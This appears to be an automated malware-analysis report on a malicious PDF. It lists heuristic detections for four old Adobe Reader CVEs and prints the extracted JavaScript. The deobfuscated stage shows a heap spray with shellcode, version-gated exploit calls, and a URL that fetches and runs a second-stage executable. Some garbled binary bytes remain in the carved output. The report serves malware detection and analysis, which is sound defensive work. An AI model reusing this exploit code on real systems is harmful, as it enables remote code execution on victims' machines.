MALICIOUS
410
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
The PDF file contains embedded JavaScript that leverages multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to download and execute a second-stage payload from the URL http://exe/95347f.exe?spl=pdf_2014. This indicates a malicious document intended to compromise the user's system.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 10
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://exe/95347f.exe?spl=pdf_2014 Referenced by PDF JavaScript
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0020_000.js |
pdf-javascript-stream | PDF /JS object 20 at offset 0x28DF | 18280 bytes |
SHA-256: d2e463110bab5bb7f146957a610f1b345fbd32aa903584199f0a7157dba94cc0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
/* abeltree */ /* abeltree */ var kL /* abeltree */ = /* abeltree */ [ /* abeltree */ "" /* abeltree */ , /* abeltree */ "es" /* abeltree */ , /* abeltree */ "un" /* abeltree */ , /* abeltree */ "pe" /* abeltree */ , /* abeltree */ "ca" /* abeltree */ ]; /* abeltree */ r /* abeltree */ = /* abeltree */ new /* abeltree */ String /* abeltree */ ( /* abeltree */ kL /* abeltree */ [ /* abeltree */ 2 /* abeltree */ ] /* abeltree */ + /* abeltree */ kL /* abeltree */ [ /* abeltree */ 1 /* abeltree */ ] /* abeltree */ + /* abeltree */ kL /* abeltree */ [ /* abeltree */ 4 /* abeltree */ ] /* abeltree */ + /* abeltree */ kL /* abeltree */ [ /* abeltree */ 3 /* abeltree */ ] /* abeltree */ + /* abeltree */ kL /* abeltree */ [ /* abeltree */ 0 /* abeltree */ ] /* abeltree */ ) /* abeltree */ ; /* abeltree */ /* abeltree */ var z /* abeltree */ = /* abeltree */ [ /* abeltree */ "rd" /* abeltree */ , /* abeltree */ "ge" /* abeltree */ , /* abeltree */ "Wo" /* abeltree */ , /* abeltree */ "um" /* abeltree */ , /* abeltree */ "eN" /* abeltree */ , /* abeltree */ "ag" /* abeltree */ , /* abeltree */ "" /* abeltree */ , /* abeltree */ "tP" /* abeltree */ , /* abeltree */ "s" /* abeltree */ ]; /* abeltree */ rS /* abeltree */ = /* abeltree */ new /* abeltree */ String /* abeltree */ ( /* abeltree */ z /* abeltree */ [ /* abeltree */ 1 /* abeltree */ ] /* abeltree */ + /* abeltree */ z /* abeltree */ [ /* abeltree */ 7 /* abeltree */ ] /* abeltree */ + /* abeltree */ z /* abeltree */ [ /* abeltree */ 5 /* abeltree */ ] /* abeltree */ + /* abeltree */ z /* abeltree */ [ /* abeltree */ 4 /* abeltree */ ] /* abeltree */ + /* abeltree */ z /* abeltree */ [ /* abeltree */ 3 /* abeltree */ ] /* abeltree */ + /* abeltree */ z /* abeltree */ [ /* abeltree … |
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | getPageWords-XOR Pidief stage normalized at offset 0x0 | 3737 bytes |
SHA-256: 482a56f31d7d286dd8becff567afe8292c69247e48a1dd84c185c6f2346af730 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
/* getPageWords download URL: http://exe/95347f.exe?spl=pdf_2014 */
var _u="http://exe/95347f.exe?spl=pdf_2014";
������������������Á�Ã���������������������
var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
var dest_table= "xa83V5OJ&Enl0Hpq-tNybkeYZ%cSAMTj7KFXBoI_rC6DL=0hwGdfu4Rvg:1zQsmiP2/9?W.U";
var hwTl9Dn = new Array();
function get_shellcode(name) {
var u = get_url();
var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1440%u008B%u008B%u588B%uEB10%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u65B8%u652E%uAB78%u9866%uAB66%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u5231%uB850%u1A36%u702F%u55FF%u5B04%uFF33%u5657%u98B8%u8AFE%uFF0E%u0455%uB857%uCEEF%u60E0%u55FF%u6804%u7474%u3A70%u2F2F";
s+= u;
return unescape(s);
}
function get_url(){
var str = this.info.author;
var ret = encode_str(str, dest_table, src_table);
return ret;
};
function encode_str(str, src_table, dest_table){
var ret="";
for(var i=0; i < str.length; i++)
{
var index = src_table.indexOf(str[i]);
if(index > -1 )
{
ret += dest_table[index];
}
}
return ret;
};
function Rq4v1qCC(PDrScZj4, ez5pL6){
while (PDrScZj4.length * 2 < ez5pL6){
PDrScZj4 += PDrScZj4;
}
PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4;
}
function x8EvTm(I7T0vko5){
var qPBt7D = 0x0c0c0c0c;
NRjjR6W6 = get_shellcode("pdf");
if (I7T0vko5 == 1){qPBt7D = 0x30303030;}
var FeQq1Vv = 0x400000;
var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);
var PDrScZj4 = unescape("%u9090%u9090");
PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);
var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;
for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){
hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;
}
}
function U2UcYKr(){
var IyIFVe = app.viewerVersion.toString();
if (IyIFVe > 8){
x8EvTm(1);
var iVvCdy8 = "12999999999999999999";
for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ ){ iVvCdy8 += "8";
} util.printf("%45000f", iVvCdy8);
}
if (IyIFVe < 8){
x8EvTm(0);
var UNXaCTHb = unescape("%u0c0c%u0c0c");
while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;
this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb});
}
if (IyIFVe < 9.1){
if (app.doc.Collab.getIcon)
{
x8EvTm(0);
var eGREUTNw = unescape("%09");
while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;
eGREUTNw = "N." + eGREUTNw;
app.doc.Collab.getIcon(eGREUTNw);
}
}
if (IyIFVe == 9.2){
x8EvTm(1);
util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());
try
{
media.newPlayer(null);
} catch(e)
{}
util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());
}
}
U2UcYKr();
��������������������������Ã�Ã���À��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������=���������������������������������������������������������������������������������==�<??�da�h
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.